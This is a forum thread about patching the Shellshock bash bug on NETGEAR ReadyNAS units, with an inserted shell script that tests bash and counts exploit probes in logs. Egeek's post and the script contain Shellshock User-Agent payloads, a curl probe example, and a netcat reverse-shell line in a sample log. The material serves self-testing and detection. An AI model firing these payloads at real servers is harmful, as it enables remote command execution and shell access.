Forum Discussion
skilke (Aspirant), Sep 25, 2014
BASH exploit - Shellshock
Hi
I have a ReadyNas Ultra 2 and it has version 3.1.17 of BASH installed which has a High risk vulnerability.
Can somebody please explain how to patch BASH so that my system is not at risk from this vulnerability. I have tried downloading the source, the patch and patching but 1 file did not patch successfully. If anyone can post some step by step instructions it would be really appreciated (as I am not an expert).
Many thanks
K
76 Replies
- PKing1 (Aspirant): Hi, new user curious about any new firmware update for Ultra 4 (4.2.27 with fixes for heartbleed/BASH?).
- egeek (Aspirant): I have confirmed my NV+ (Sparc) is vulnerable when you visit the shares URL (but not the admin URL). You can test this by modifying the User-Agent string in a browser with some of the code required to exploit vulnerable bash. In this case I used a simple ping command to do it and watched the target machine using tcpdump.
User-Agent: () { :; }; /bin/bash -c "ping -c 5 [ip address]"
I also modified the string to spawn a netcat session back to a listener (reverse shell). Netcat is not installed by default so that did not work. So as an experiment I installed it and found that the default sparc debian package includes the -e option for netcat and made it trivial to open a shell with a fairly simple modification to the User-Agent string.
I tried to update packages and install a newer bash, but I think that the sparc debian packages are not updated yet.
:~# bash -version
GNU bash, version 2.05b.0(1)-release (sparc-unknown-linux-gnu)
Copyright (C) 2002 Free Software Foundation, Inc.
That's all I have done to test this so far.
- mdgm-ntgr (NETGEAR Employee Retired): egeek, install the 4.1.14 beta
or modify your sources list to use the 4.1.14 repository and update bash using apt-get.
- egeek (Aspirant):
mdgm wrote: egeek install the 4.1.14 beta
or modify your sources list to use the 4.1.14 repository and update bash using apt-get
Thanks, I just caught up with the first few pages and have the beta firmware. On to my other devices now.
- egeek (Aspirant): All good with the beta firmware update. No responses to my UA string attack or on the shell itself.
NAS# bash -version
GNU bash, version 2.05b.0(1)-release (sparc-unknown-linux-gnu)
Copyright (C) 2002 Free Software Foundation, Inc.
NAS:~# env X="() { :;} ; echo busted" /bin/sh -c "echo stuff"
/bin/sh: warning: X: ignoring function definition attempt
/bin/sh: error importing function definition for `X'
stuff
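What egeek describes in his two posts above (a function definition smuggled into an environment variable, and the same payload sent as a User-Agent header), as an added example that is not part of the thread or of NETGEAR's firmware: POSIX shell functions that run his environment-variable test against a bash binary (CVE-2014-6271, the Shellshock bug), add the matching check for CVE-2014-7169 (the parser bug the first fix left behind, so a bash that passes only the first test can still be affected), build the User-Agent value he used with a harmless command in place of the ping, and count such probes in a constructed access-log excerpt. The bash path, the host name, the addresses and the log lines are assumptions.

```shell
#!/bin/sh
# Added example; not code from the thread. Reproduces the two checks egeek
# described (the function definition smuggled in an environment variable,
# and the same payload sent as a User-Agent header) as shell functions,
# adds the follow-up check for CVE-2014-7169, and counts such probes in a
# constructed access-log excerpt. Assumed: a bash binary on PATH, a POSIX
# sh, and the made-up host name, addresses and log lines below.

# check_bash_env BIN: CVE-2014-6271. An unpatched bash that finds a
# function definition in an environment variable also executes whatever
# follows the closing brace, so "busted" appears in the output.
# Prints "vulnerable", "patched" or "missing" (binary not found).
check_bash_env() {
    bin=${1:-bash}
    command -v "$bin" >/dev/null 2>&1 || { echo missing; return 0; }
    out=$(env X='() { :;}; echo busted' "$bin" -c 'echo stuff' 2>/dev/null)
    case $out in
        *busted*) echo vulnerable ;;
        *)        echo patched ;;
    esac
}

# check_bash_7169 BIN: CVE-2014-7169, the parser bug left after the first
# fix. On an affected bash the malformed function body turns the trailing
# "\" and the command into a redirection, so "echo date" writes the output
# of date into a file called "echo" in the current directory. We run it
# in a scratch directory and look for that file.
check_bash_7169() {
    bin=${1:-bash}
    command -v "$bin" >/dev/null 2>&1 || { echo missing; return 0; }
    tmp=$(mktemp -d) || return 1
    ( cd "$tmp" && env X='() { (a)=>\' "$bin" -c 'echo date' >/dev/null 2>&1 ) || :
    if [ -e "$tmp/echo" ]; then echo vulnerable; else echo patched; fi
    rm -rf "$tmp"
}

# probe_header CMD: the User-Agent value egeek sent to the shares URL, with
# CMD in place of his ping. A CGI front end that copies request headers
# into the environment of a bash process hands CMD to that bash.
probe_header() {
    printf '() { :; }; /bin/bash -c "%s"' "$1"
}
# Against a NAS you own, something like (host name assumed, not run here):
#   curl -s -A "$(probe_header 'ping -c 5 10.0.0.9')" http://nas.example/shares/

# count_probes < LOG: number of access-log lines carrying a bash function
# definition "() {" in any field, i.e. a Shellshock probe in User-Agent,
# Referer or the request line itself.
count_probes() {
    grep -c '() *{' || :
}

# Constructed Apache combined-format lines: the first and third carry a
# probe (in User-Agent and Referer respectively), the second is ordinary.
SAMPLE_LOG='10.0.0.5 - - [25/Sep/2014:10:00:01 +0000] "GET /shares/ HTTP/1.1" 200 512 "-" "() { :; }; /bin/bash -c \"ping -c 5 10.0.0.9\""
10.0.0.6 - - [25/Sep/2014:10:00:02 +0000] "GET /admin/ HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.7 - - [25/Sep/2014:10:00:03 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 33 "() { :;}; /bin/bash -c \"nc -e /bin/sh 10.0.0.9 4444\"" "curl/7.38.0"'

printf 'CVE-2014-6271 (function import): %s\n' "$(check_bash_env bash)"
printf 'CVE-2014-7169 (parser follow-up): %s\n' "$(check_bash_7169 bash)"
printf 'Shellshock probes in sample log: %s\n' \
    "$(printf '%s\n' "$SAMPLE_LOG" | count_probes)"
```

Run it on the NAS over SSH as well as on a workstation; egeek's output above is what a fixed bash looks like on the first test, a warning about an ignored function definition followed by plain "stuff". The probe header is only for a host you own, and the log grep is the cheap way to find out whether anyone has already tried the same thing against your Frontview port.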
- mdgm-ntgr (NETGEAR Employee Retired):
PKing wrote: Hi, new user curious about any new firmware update for Ultra 4 (4.2.27 with fixes for heartbleed/BASH?).
The 4.2.27 beta firmware addresses this: http://www.readynas.com/forum/viewtopic.php?f=51&t=70385
- schmitzm (Aspirant):
mdgm wrote:
  schmitzm wrote: I'm probably running a rather dated version of RAIDiator on our NAS - can't check the version since I shut down Frontview pretty much first thing when the news broke. Are there any update prerequisites for the current betas - i.e. a requirement for a minimum release level?
  What model do you have?
  There shouldn't be an issue.
  Of course it is a good idea to ensure you have an up to date backup first.
  There is a very low chance that this vulnerability would be exploited, especially if you don't forward ports to the NAS. That's not to say there isn't a way, but we haven't found any.
  However, if you are concerned I would turn off port forwards until after updating to the beta with the patch (or a newer release).
My model is a NV+ (v1), firmware 4.1.4. Just saw the beta firmware installed OK on another of that kind - good to know. Backups are reasonably current but I'll make sure to sync everything up again before an upgrade. A bit of a worry is the tedious fsck I'm almost certainly facing on next reboot.
Port forwarding or not is not the issue - having the NAS exposed to a large untrusted internal network is what worries me most. I've added access controls in /etc/apache/frontview/httpd.conf and disabled anything I don't need for now.
You can probably guess that I have enabled ssh access on my NAS - will this be retained on upgrade? Is the enablerootssh addon still available for this firmware?
One last one - is the beta firmware patched to include the upstream patch bash205b-009 or bash205b-010?
Thanks for your help and encouragement!
- schmitzm (Aspirant):
wtriba wrote:
  schmitzm wrote:
    wtriba wrote: I'd like to install 4.1.14 beta on my NV+. Is there a direct link to download this?
    Thanks!
  http://www.readynas.com/download/beta/raidiator/4.1.14/RAIDiator-4.1.14-T5
  The FW update to 4.1.14-T5 went fine on my NV+ (v1) and all is well. Confirmed shellshock is no longer an issue with this release.
  Thank you!
Thanks for reporting your success - while I've got some way towards cross-compiling a 2.05b bash that might work, it's nowhere near as straightforward to be a guaranteed success. The firmware upgrade is surely a safer way!
- mdgm-ntgr (NETGEAR Employee Retired): SSH access is retained on upgrade, yes.
Your modifications to httpd.conf may be overwritten, so you should back up your changes to that.
- schmitzm (Aspirant):
mdgm wrote: SSH access is retained on upgrade, yes.
Your modifications to httpd.conf may be overwritten, so you should back up your changes to that.
Thanks - the httpd.conf mods I can quickly redo now that I've refreshed my memory on the syntax.